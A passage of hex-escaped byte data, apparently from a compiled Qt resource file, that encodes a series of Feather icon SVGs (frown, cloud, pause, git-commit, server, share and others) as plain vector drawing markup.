\x22\x31\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\
\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x31\x38\x22\x20\x79\x31\x3d\x22\x31\x38\x22\
\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x86\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x72\x6f\x77\x6e\
\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\
\x64\x3d\x22\x4d\x31\x36\x20\x31\x36\x73\x2d\x31\x2e\x35\x2d\x32\
\x2d\x34\x2d\x32\x2d\x34\x20\x32\x2d\x34\x20\x32\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\
\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x39\x2e\x30\
\x31\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\
\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x30\x31\x22\
\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x18\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x6c\x6f\x75\x64\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x31\
\x30\x68\x2d\x31\x2e\x32\x36\x41\x38\x20\x38\x20\x30\x20\x31\x20\
\x30\x20\x39\x20\x32\x30\x68\x39\x61\x35\x20\x35\x20\x30\x20\x30\
\x20\x30\x20\x30\x2d\x31\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x75\x73\x65\
\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x36\x22\x20\x79\x3d\
\x22\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x34\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x34\x22\x20\x79\x3d\
\x22\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x34\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x31\x36\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x83\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x2d\x70\
\x75\x6c\x6c\x2d\x72\x65\x71\x75\x65\x73\x74\x22\x3e\x3c\x63\x69\
\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\x22\x20\x63\x79\x3d\
\x22\x31\x38\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\
\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x36\x22\x20\x63\x79\x3d\x22\x36\x22\x20\x72\x3d\x22\x33\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\
\x3d\x22\x4d\x31\x33\x20\x36\x68\x33\x61\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x20\x32\x20\x32\x76\x37\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\
\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\
\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x69\x61\x6e\
\x67\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\
\x30\x2e\x32\x39\x20\x33\x2e\x38\x36\x4c\x31\x2e\x38\x32\x20\x31\
\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x37\x31\
\x20\x33\x68\x31\x36\x2e\x39\x34\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x31\x2e\x37\x31\x2d\x33\x4c\x31\x33\x2e\x37\x31\x20\
\x33\x2e\x38\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x33\
\x2e\x34\x32\x20\x30\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x38\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x72\x72\x6f\x77\
\x2d\x75\x70\x2d\x6c\x65\x66\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x31\x37\x22\x20\x79\x31\x3d\x22\x31\x37\x22\x20\
\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x37\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x37\x20\x31\x37\x20\x37\x20\x37\x20\
\x31\x37\x20\x37\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x67\x69\x74\x2d\x63\
\x6f\x6d\x6d\x69\x74\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\
\x3d\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x2e\x30\x35\x22\x20\x79\x31\
\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\
\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x37\x2e\x30\x31\x22\x20\x79\x31\x3d\
\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x32\x32\x2e\x39\x36\x22\x20\
\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x48\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x65\x6e\x64\
\x69\x6e\x67\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x33\x20\x36\x20\x31\
\x33\x2e\x35\x20\x31\x35\x2e\x35\x20\x38\x2e\x35\x20\x31\x30\x2e\
\x35\x20\x31\x20\x31\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\
\x6e\x74\x73\x3d\x22\x31\x37\x20\x36\x20\x32\x33\x20\x36\x20\x32\
\x33\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x61\x67\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x30\x2e\x35\x39\x20\
\x31\x33\x2e\x34\x31\x6c\x2d\x37\x2e\x31\x37\x20\x37\x2e\x31\x37\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x38\x33\x20\
\x30\x4c\x32\x20\x31\x32\x56\x32\x68\x31\x30\x6c\x38\x2e\x35\x39\
\x20\x38\x2e\x35\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x30\x20\x32\x2e\x38\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x37\x22\x20\x79\x31\x3d\
\x22\x37\x22\x20\x78\x32\x3d\x22\x37\x2e\x30\x31\x22\x20\x79\x32\
\x3d\x22\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xaf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x65\x72\x76\x65\
\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\
\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x38\x22\x20\x72\x78\x3d\x22\x32\
\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\x22\x20\x79\x3d\x22\x31\
\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x30\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x38\x22\x20\x72\x78\x3d\x22\x32\x22\x20\
\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x36\
\x22\x20\x78\x32\x3d\x22\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\
\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x36\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\x78\
\x32\x3d\x22\x36\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x38\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x85\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x68\x61\x73\x68\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\
\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\
\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x31\x35\x22\x20\
\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x30\x22\x20\x79\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\
\x38\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x22\x20\
\x79\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\
\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\xbd\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x68\x61\x72\x65\
\x2d\x32\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x38\x22\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x3d\x22\x33\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x36\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\x22\x20\
\x63\x79\x3d\x22\x31\x39\x22\x20\x72\x3d\x22\x33\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x38\x2e\x35\x39\x22\x20\x79\x31\x3d\x22\x31\x33\x2e\x35\x31\
\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x34\x32\x22\x20\x79\x32\x3d\
\x22\x31\x37\x2e\x34\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x2e\x34\x31\x22\x20\
